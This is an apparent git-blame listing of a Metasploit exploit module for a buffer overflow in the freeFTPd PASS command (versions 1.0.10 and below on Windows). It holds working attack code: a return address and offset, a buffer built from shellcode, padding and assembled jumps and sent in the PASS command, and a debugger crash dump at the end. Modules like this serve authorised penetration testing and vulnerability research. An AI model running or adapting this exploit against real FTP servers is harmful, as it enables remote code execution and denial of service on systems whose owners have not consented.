2013-09-26 10:37:23 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-09-26 10:37:23 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-09-27 01:13:28 +00:00
|
|
|
Rank = NormalRanking
|
2013-09-26 10:37:23 +00:00
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Ftp
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
2013-09-27 07:05:42 +00:00
|
|
|
'Name' => "freeFTPd PASS Command Buffer Overflow",
|
2013-09-26 10:37:23 +00:00
|
|
|
'Description' => %q{
|
2013-09-27 02:37:52 +00:00
|
|
|
freeFTPd 1.0.10 and below contains an overflow condition that is triggered as
|
|
|
|
user-supplied input is not properly validated when handling a specially crafted
|
|
|
|
PASS command. This may allow a remote attacker to cause a buffer overflow,
|
2013-09-30 18:30:31 +00:00
|
|
|
resulting in a denial of service or allow the execution of arbitrary code.
|
2013-09-26 10:37:23 +00:00
|
|
|
|
2013-09-27 01:13:28 +00:00
|
|
|
FreeFTPd must have an account set to authorization anonymous user account.
|
2013-09-26 10:37:23 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
2013-09-27 07:05:42 +00:00
|
|
|
'Wireghoul', # Initial discovery, PoC
|
2013-09-26 10:37:23 +00:00
|
|
|
'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['OSVDB', '96517'],
|
|
|
|
['EDB', '27747'],
|
2013-09-27 14:47:39 +00:00
|
|
|
['BID', '61905']
|
2013-09-26 10:37:23 +00:00
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'BadChars' => "\x00\x0a\x0d",
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
2013-09-27 14:47:39 +00:00
|
|
|
'Arch' => ARCH_X86,
|
2013-09-26 10:37:23 +00:00
|
|
|
'Targets' =>
|
|
|
|
[
|
2013-09-27 02:35:03 +00:00
|
|
|
['freeFTPd 1.0.10 and below on Windows Desktop Version',
|
2013-09-26 10:37:23 +00:00
|
|
|
{
|
2013-09-27 02:35:03 +00:00
|
|
|
'Ret' => 0x004014bb, # pop edi # pop esi # ret 0x04 [FreeFTPDService.exe]
|
2013-09-26 10:37:23 +00:00
|
|
|
'Offset' => 801,
|
|
|
|
}
|
|
|
|
],
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'DisclosureDate' => "Aug 20 2013",
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options([
|
|
|
|
OptString.new('FTPUSER', [ true, 'The username to authenticate with', 'anonymous' ]),
|
|
|
|
|
|
|
|
], self.class)
|
|
|
|
|
|
|
|
# We're triggering the bug via the PASS command, no point to have pass as configurable
|
|
|
|
# option.
|
|
|
|
deregister_options('FTPPASS')
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
|
|
|
|
connect
|
|
|
|
disconnect
|
|
|
|
|
2013-09-27 07:05:42 +00:00
|
|
|
# All versions including and above version 1.0 report "220 Hello, I'm freeFTPd 1.0"
|
|
|
|
# when banner grabbing.
|
2013-09-27 01:13:28 +00:00
|
|
|
if banner =~ /freeFTPd 1\.0/
|
2014-01-21 17:07:03 +00:00
|
|
|
return Exploit::CheckCode::Appears
|
2013-09-26 10:37:23 +00:00
|
|
|
else
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
|
|
|
connect
|
|
|
|
print_status("Trying target #{target.name} with user #{user()}...")
|
|
|
|
|
2013-09-27 02:37:52 +00:00
|
|
|
off = target['Offset'] - 9
|
2013-09-26 10:37:23 +00:00
|
|
|
|
|
|
|
bof = payload.encoded
|
|
|
|
bof << rand_text(off - payload.encoded.length)
|
|
|
|
bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + off.to_s).encode_string
|
|
|
|
bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5").encode_string
|
|
|
|
bof << rand_text(2)
|
|
|
|
bof << [target.ret].pack('V')
|
|
|
|
|
|
|
|
send_user(datastore['FTPUSER'])
|
2013-09-27 14:47:39 +00:00
|
|
|
raw_send("PASS #{bof}\r\n")
|
|
|
|
disconnect
|
2013-09-26 10:37:23 +00:00
|
|
|
|
|
|
|
end
|
|
|
|
end
|
2013-09-27 07:05:42 +00:00
|
|
|
|
|
|
|
=begin
|
|
|
|
(c78.ea4): Access violation - code c0000005 (first chance)
|
|
|
|
First chance exceptions are reported before any exception handling.
|
|
|
|
This exception may be expected and handled.
|
|
|
|
eax=0012b324 ebx=01805f28 ecx=00000019 edx=00000057 esi=4141413d edi=00181e18
|
|
|
|
eip=76c23e8d esp=0012b310 ebp=0012b328 iopl=0 nv up ei pl nz na pe nc
|
|
|
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
|
|
|
OLEAUT32!SysFreeString+0x55:
|
|
|
|
76c23e8d ff36 push dword ptr [esi] ds:0023:4141413d=????????
|
|
|
|
|
|
|
|
FAULTING_IP:
|
|
|
|
OLEAUT32!SysFreeString+55
|
|
|
|
76c23e8d ff36 push dword ptr [esi]
|
|
|
|
|
|
|
|
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
|
|
|
|
ExceptionAddress: 76c23e8d (OLEAUT32!SysFreeString+0x00000055)
|
|
|
|
ExceptionCode: c0000005 (Access violation)
|
|
|
|
ExceptionFlags: 00000000
|
|
|
|
NumberParameters: 2
|
|
|
|
Parameter[0]: 00000000
|
|
|
|
Parameter[1]: 4141413d
|
|
|
|
Attempt to read from address 4141413d
|
|
|
|
=end
|